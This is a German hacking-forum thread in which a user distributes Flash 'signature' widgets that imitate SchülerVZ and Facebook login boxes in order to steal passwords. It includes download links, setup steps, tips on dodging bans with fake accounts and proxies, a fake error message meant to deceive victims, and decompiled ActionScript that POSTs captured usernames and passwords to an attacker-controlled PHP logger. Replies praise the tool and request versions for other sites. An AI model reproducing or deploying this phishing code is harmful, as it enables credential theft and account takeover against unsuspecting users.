Weiß nicht, ob es sowas schonmal gab, die Idee dazu is mir vorhin so spontan gekommen, da konnte ich nich wiederstehen, es zu coden:
Eine Phishing Signatur. Das ganze ist nicht einfach ein Link zu einer Phishing Seite, nein das war mir zu unseriös.
Das ganze ist mit Flash (Actionscript 2) programmiert und läuft ab Flashplayer8, den hat so gut wie jeder.
WIe man das nun einbindet:
In immer mehr Foren gibt es einen BB Code um Flash einzubinden. Der ist beispielsweise bei e107 link_zu_flash
Ihr braucht also nur ein Board, wo so ein BB-Code funktioniert. Das ganze hat den Vorteil, dass ihr keine Promo für eure Seite braucht, da es eh schon Public ist, ausserdem loggt sich ein User eher ein ein schon bestehendes LoginFeld ein, als dass er auf einen Phishing Link klickt. Nachteil ist jedoch, dass ihr wahrscehinlich gebannt werdet, also einen Fake-account erstellen und Proxy benutzen ;)

SVZ:

( Screenshot: )
http://www.abload.de/img/svzspy20sw.png

Das war jetzt so meine erste Idee. Der User kann sich also direkt im Forum dann dort einloggen. Es öffnet sich ein neuer Tab, schnell werden die Daten im angegeben Script in eine logdatei gespeichert und man wird zu SVZ weitergeletiet(vorrausgesetzt die Email geht durch die Emailprüfung. Es wird auf . und @ überprüft. Wenn diese nicht vorhanden sind, dann wird das ganze erst garnicht weitergegeben und eine Fehlermeldung eines inkorrekten Logins ausgegeben). Danach gibt die Signatur eine dieser doofen SVZ Meldungen aus (Fehlercode bla bla) und der User soll denken, das Login sei fehlgeschlagen, dabei wurden seine Daten bereits gespeichert ;) .

Das Script hab ich euch natürlich bereitgestellt:

Downloadlink V2: http://www.sendspace.com/file/6heok5
Passwort: free-hack.com


Anleitung:
-Ladet euch die Datei herunter und enptackt sie.
-Öffnet die info.xml und tragt bei phpscript="" euren phpscript(den kompletten link, http://...) ein. Ebenfalls könnt ihr noch die Fehlermeldungen verändern, muss aber nicht. Die Fehlermeldung ist das, was später nach dem Login angezeigt wird. Das ist dafür, um dem User einen Grund zu geben, warum er jetzt nicht die "tollen" Features von SVZ Spy benutzen kann.
-Die Dateien auf einen Server ziehen.
-Die spy.swf in ein Forum in die Sig einbinden (Nicht die HTML datei !)
-Warten bis ein Idiot sich einloggt(hoffen, dass sie nicht zu schnell vom Admin entfernt wird, bzw dass der Admin das überhaupt checkt)
-Die #_database.log vom Server ziehen und mit nem Editor öffnen
-Spaß mit den Passwörtern haben


facebook:

http://www.abload.de/img/screenropg.png

Download:http://www.sendspace.com/file/3cp2kb
Passwort: free-hack.com

Anleitung (ein paar Unterschiede zu SVZ):
-Dateien runterladen und entpacken.
-Alle Dateien auf einen Server ziehen
-Die info.xml öffnen. Jetzt schreibt ihr bei phpscript="" euren Pfad zu der PHP Datei, die alles speichert, rein(facebookpro.php).Wichtig: Ihr müsst die ganze URL reinschreiben, mit "http://..." !
-Bei Bedarf könn ihr jetzt noch die Fehlermeldung, die ausgegeben wird ändern. Diese Fehlermeldung ist eigentlich garkeine, da kein Fehler besteht! Sie wird nur zum Fake dem User gezeigt, damit er sich nicht
wundert, wo denn nun seine tollen Features bleiben. Ausser könnt ihr noch die "Features", die euer Fake bieten soll, ändern.
-In einem Forum als Signatur nehmen
-Die #_database.log vom Server ziehen und mit nem Editor öffnen
-Spaß mit den Passwörtern haben xD

Ich hab das ganze nicht in den Phishing Sammelthread gepostet, da es sich ja hier um eine SIgnatur handelt, nicht um eine komplette Seite ;)

Respekt! Verdammt gute Idee und dann noch schön umgesetzt!

Passwort brauche ich fürs Archive ;D

Aber für die Idee gibst 10/10 Punkte!

Jap, habs Passwort vergessen, sorry ;)
Habs jetzt editiert, Passwort: free-hack.com

Ich hab schon einige Phishing Seiten hier gesehen, mit guter Ideen aber Umsetzen so lala aber das sieht echt sehr gut aus! ;)

Kannst du noch das Passwort als "*" anzeigen?
Sonst ist es unseriös.

Ok bin dran, das auch noch als *** zu machen. Muss nurnoch bischen an der Komponente rumschrauben, dann wird das schon ;)

Edit:
So habe den Downloadlink editiert, ist die neue Version. Das Passwort wird nun als *** angezeigt. Viel Spaß.

Hätte noch ne Idee, aber weil ich eh nicht phishe....

Wie wäre es mit SVZ in Blau oder so? ;)
Das wollen ja viele.

Auch keine schlechte Idee, danke. Ich kann auch noch machen, dass man diese beiden "Vorteile" von SVZ Spy noch in der XML editieren kann ;) (für mehr als 2 reicht der Platz in der Signatur leider nicht)
Ansonsten kann ich auch gerne ein Tutorial machen, wie man so eine Sig erstellt, wenn Bedarf besteht ^^

haha da muss man ja schon ein großer doofkopf sein :)

Hab ein Problem . Wenn ich mich einloggen will erscheint da immer " Fehler beim einloggen" :-Error: 5a6sdf68a4fwwr613

Was mach ich falsch .... Im voraus , danke

Super Idee muss man sagen!
Ich würde auch eines für Netlog (http://de.netlog.com/) machen, Netlog (http://de.netlog.com/) hat ja auch viele User...
Und statt Namen ändern könntest du Credits laden einfügen...
Super Idee 10/10

haha da muss man ja schon ein großer doofkopf sein

Das muss man bei einer normalen Phishing Seite auch, aber davon gibt es genug. Wie schon gesagt, hier hat es halt den Vorteil, dass man keine Promo für die Seite machen muss ;)


@Kriw bin dabei für Facebook, danach kommt vllt noch Netlog ;)



Hab ein Problem . Wenn ich mich einloggen will erscheint da immer " Fehler beim einloggen" :-Error: 5a6sdf68a4fwwr613

Was mach ich falsch .... Im voraus , danke

Das ist kein Problem, du machst auch nix falsch. Das wird immer angezeigt, wenn alles gut gegangen ist, nur damit der User nicht daran zweifelt, dass es sich daran um etwas echtest handelt. Du solltest jetzt eine Logdatei auf dem Server haben. (Ist ein Fake von diesen typischen SVZ Fehlermeldungen ;) )Hatte ich aber eigentlich auch in meinen ersten post geschrieben, werde es nochmal verdeutlichen. Alternativ kannst du die Fehlermeldung in der info.xml anpassen ;)

Keine schlechte Idee... direkt ausprobieren, einige deppen werden wohl wieder die ersten vics sein :p

Gut umgesetzt! *thumbs up*

Greetz
Reptil

// Edit
Falsch Thread.

Update:
Facebook hinzugefügt ;)

http://www.abload.de/img/screenropg.png

Siehe erster Post, viel Spaß

philippo,
kannst du ein Tut posten?
Das insteressiert mich jetzt ungemein.

hey top finde dies eine super idee
top were es wenn du sowas noch für icq coden könntest

phlippi (http://free-hack.com/member.php?u=55353) 4 papst :D

philippo,
kannst du ein Tut posten?
Das insteressiert mich jetzt ungemein.Dafür brauchste eigentlich kein Tutorial, setze Dich mit ActionScript auseinander und dann wirst dass in kürzer Zeit nachmachen können.



// Action script...

// [Action in Frame 1]
function validEmail(mail)
{
var _loc1 = false;
if (mail.indexOf("@") != -1 && mail.indexOf(".") != -1)
{
_loc1 = true;
} // end if
return (_loc1);
} // End of the function
stop ();
var user;
var pw;
var x_errorhead = new Array();
var x_error = new Array();
var x_phpscript = new Array();
var x = new XML();
x.ignoreWhite = true;
x.onLoad = function (success)
{
var _loc2 = this.firstChild.childNodes;
for (i = 0; i <= _loc2.length; i++)
{
x_errorhead.push(_loc2[i].attributes.errorhead);
x_error.push(_loc2[i].attributes.error);
x_phpscript.push(_loc2[i].attributes.phpscript);
} // end of for
};
x.load("info.xml");
login.onPress = function ()
{
user = _root.username.text;
pw = passwort.text;
trace (pw);
mailvalid = validEmail(user);
_root.gotoAndPlay(2);
};

// [Action in Frame 2]
stop ();
var lv;
if (mailvalid == false)
{
username.text = "";
pw.text = "";
error.text = "-Ungülitge eMail Adresse";
error_head.text = "Ungültiges Login:";
}
else
{
error.text = x_error[0];
error_head.text = x_errorhead[0];
lv = new LoadVars();
lv.username = user;
lv.pw = pw;
lv.send(x_phpscript[0], "_blank", "POST");
} // end else if

Flash decompiler Trillix, hpoc? xD

Naja, ich mache euch gerne ein Tut dazu, allein aus dem Sourcecode geht ja nicht so viel hervor, vor allem weil man den Aufbau der Datei dann nicht sieht. Bin selber kein Ass in Actionscript, aber es reicht halt für sowas ;)

Sothink SWF Decompiler ;)

Aber Du hast recht, am besten machst Du gleich ein Tutorial.

es gab doch mahl ne möglichkeit html codes in icq zu verschicken
da hette man dann auch nen phishing scrip verschicken können aber glaube das wurde schon gefixt

Wie wärs jetzt noch mit Netlog oder myspace?

Wie wärs jetzt noch mit Netlog oder myspace?


Ich mach so ein Ding nich in 5 Minuten, ich mach euch ein Tutorial, dann brauch nicht jeder reinschreiben, was er will, sondern kann selber machen und dann posten ;)
(hab nur heute keine Zeit mehr, mache es dann morgen)

Ich mach so ein Ding nich in 5 Minuten, ich mach euch ein Tutorial, dann brauch nicht jeder reinschreiben, was er will, sondern kann selber machen und dann posten ;)
(hab nur heute keine Zeit mehr, mache es dann morgen)

Steam Community wäre genialer :)

Oder Paypal .. Oder RS :D

Oder Paypal .. Oder RS
Naja, Paypal und Rs, vor allem aber Paypal halte ich dafür nicht geeignet. Dann sollte man schon auf eine richtige Phishing Seite setzen. Rs bringt ja nix, ein Rs Premium User hat ja schon alle Vorteile, die es gibt und ausserdem, warum sollte er sich einloggen, wenn er nichts runterladen kann? Bei Paypal ist das auch so ne Sache. Diese Signatur soll ja vor allem Junge Idioten ansprechen, die stolz darauf sind, SVZ zu haben und dann denken, sie könnten bei ihren Freunden angeben, wenn sie irgendeine Erweiterung dazu haben. Bei Paypal ist man, denke ich, um so einiges vorsichtiger mit seinen Daten. Ich meine, warum sollte jemand seine Paypal Daten einfach so in eine Signatur eingeben, ohne dafür etwas zu bekommen? Das einzige, was mir da einfiele, wäre, dass man verspricht, die Person würde 5 Euro Bonusguthaben oder sowas bekommen, aber ob da jemand drauf reinfällt...

Für alles findest du nen deppen - selbst wenn er unterschreiben müsste :D